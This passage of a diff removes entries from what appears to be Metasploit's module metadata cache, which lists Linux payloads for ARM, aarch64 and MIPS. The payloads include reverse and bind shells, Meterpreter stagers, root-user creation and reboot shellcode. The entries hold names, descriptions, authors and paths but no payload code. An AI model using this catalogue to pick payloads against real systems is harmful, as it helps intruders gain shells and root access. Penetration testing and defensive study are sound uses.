"/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/aarch64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/aarch64/shell", - "stager_refname": "linux/aarch64/reverse_tcp" - }, - "payload_linux/aarch64/shell_reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/linux/aarch64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/aarch64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armbe/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/armbe/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "armbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/armbe/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armbe/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/armbe/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "armbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/armbe/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armbe/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/armbe/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "armbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/armbe/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armbe/shell_bind_tcp": { - "name": "Linux ARM Big Endian Command Shell, Bind TCP Inline", - "fullname": "payload/linux/armbe/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Balazs Bucsay @xoreipeip " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [ - "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s" - ], - "platform": "Linux", - "arch": "armbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/armbe/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armle/adduser": { - "name": "Linux Add User", - "fullname": "payload/linux/armle/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Jonathan Salwan" - ], - "description": "Create a new user with UID 0", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armle/adduser.rb", - "is_install_path": true, - "ref_name": "linux/armle/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armle/exec": { - "name": "Linux Execute Command", - "fullname": "payload/linux/armle/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Jonathan Salwan" - ], - "description": "Execute an arbitrary command", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armle/exec.rb", - "is_install_path": true, - "ref_name": "linux/armle/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armle/meterpreter/bind_tcp": { - "name": "Linux Meterpreter, Bind TCP Stager", - "fullname": "payload/linux/armle/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "nemo " - ], - "description": "Inject the mettle server payload (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/armle/bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/armle/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/armle/meterpreter", - "stager_refname": "linux/armle/bind_tcp" - }, - "payload_linux/armle/meterpreter/reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Stager", - "fullname": "payload/linux/armle/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "nemo ", - "tkmru" - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/armle/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/armle/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/armle/meterpreter", - "stager_refname": "linux/armle/reverse_tcp" - }, - "payload_linux/armle/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/armle/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/armle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armle/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/armle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/armle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armle/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/armle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/armle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armle/shell/bind_tcp": { - "name": "Linux dup2 Command Shell, Bind TCP Stager", - "fullname": "payload/linux/armle/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo " - ], - "description": "dup2 socket in r12, then execve.\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/armle/bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/armle/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/armle/shell", - "stager_refname": "linux/armle/bind_tcp" - }, - "payload_linux/armle/shell/reverse_tcp": { - "name": "Linux dup2 Command Shell, Reverse TCP Stager", - "fullname": "payload/linux/armle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo ", - "tkmru" - ], - "description": "dup2 socket in r12, then execve.\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/armle/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/armle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/armle/shell", - "stager_refname": "linux/armle/reverse_tcp" - }, - "payload_linux/armle/shell_bind_tcp": { - "name": "Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/linux/armle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "civ", - "hal" - ], - "description": "Connect to target and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armle/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/armle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armle/shell_reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/linux/armle/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "civ" - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/armle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mips64/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/mips64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mips64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/mips64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mips64/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/mips64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mips64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/mips64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mips64/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/mips64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mips64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mips64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsbe/exec": { - "name": "Linux Execute Command", - "fullname": "payload/linux/mipsbe/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Michael Messner ", - "entropy " - ], - "description": "A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.", - "references": [ - "EDB-17940" - ], - "platform": "Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsbe/exec.rb", - "is_install_path": true, - "ref_name": "linux/mipsbe/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsbe/meterpreter/reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Stager", - "fullname": "payload/linux/mipsbe/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "juan vazquez ", - "tkmru" - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsbe/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/mipsbe/meterpreter", - "stager_refname": "linux/mipsbe/reverse_tcp" - }, - "payload_linux/mipsbe/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/mipsbe/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/mipsbe/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsbe/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/mipsbe/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/mipsbe/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsbe/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/mipsbe/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsbe/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsbe/reboot": { - "name": "Linux Reboot", - "fullname": "payload/linux/mipsbe/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Michael Messner ", - "rigan - " - ], - "description": "A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup procedures.", - "references": [ - "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" - ], - "platform": "Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsbe/reboot.rb", - "is_install_path": true, - "ref_name": "linux/mipsbe/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsbe/shell/reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/linux/mipsbe/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "juan vazquez ", - "tkmru" - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsbe/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/mipsbe/shell", - "stager_refname": "linux/mipsbe/reverse_tcp" - }, - "payload_linux/mipsbe/shell_bind_tcp": { - "name": "Linux Command Shell, Bind TCP Inline", - "fullname": "payload/linux/mipsbe/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "scut", - "vaicebine", - "Vlatko Kosturjak", - "juan vazquez " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsbe/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsbe/shell_reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/linux/mipsbe/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "rigan ", - "juan vazquez " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [ - "EDB-18226" - ], - "platform": "Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsbe/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsle/exec": { - "name": "Linux Execute Command", - "fullname": "payload/linux/mipsle/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Michael Messner ", - "entropy " - ], - "description": "A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.", - "references": [ - "EDB-17940" - ], - "platform": "Linux", - "arch": "mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsle/exec.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsle/meterpreter/reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Stager", - "fullname": "payload/linux/mipsle/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "juan vazquez ", - "tkmru" - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/mipsle/meterpreter", - "stager_refname": "linux/mipsle/reverse_tcp" - }, - "payload_linux/mipsle/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/mipsle/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsle/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/mipsle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsle/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/mipsle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsle/reboot": { - "name": "Linux Reboot", - "fullname": "payload/linux/mipsle/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Michael Messner ", - "rigan - " - ], - "description": "A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.", - "references": [ - "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" - ], - "platform": "Linux", - "arch": "mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsle/reboot.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsle/shell/reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/linux/mipsle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "juan vazquez ", - "tkmru" - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/mipsle/shell", - "stager_refname": "linux/mipsle/reverse_tcp" - }, - "payload_linux/mipsle/shell_bind_tcp": { - "name": "Linux Command Shell, Bind TCP Inline", - "fullname": "payload/linux/mipsle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "scut", - "vaicebine", - "Vlatko Kosturjak", - "juan vazquez " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": 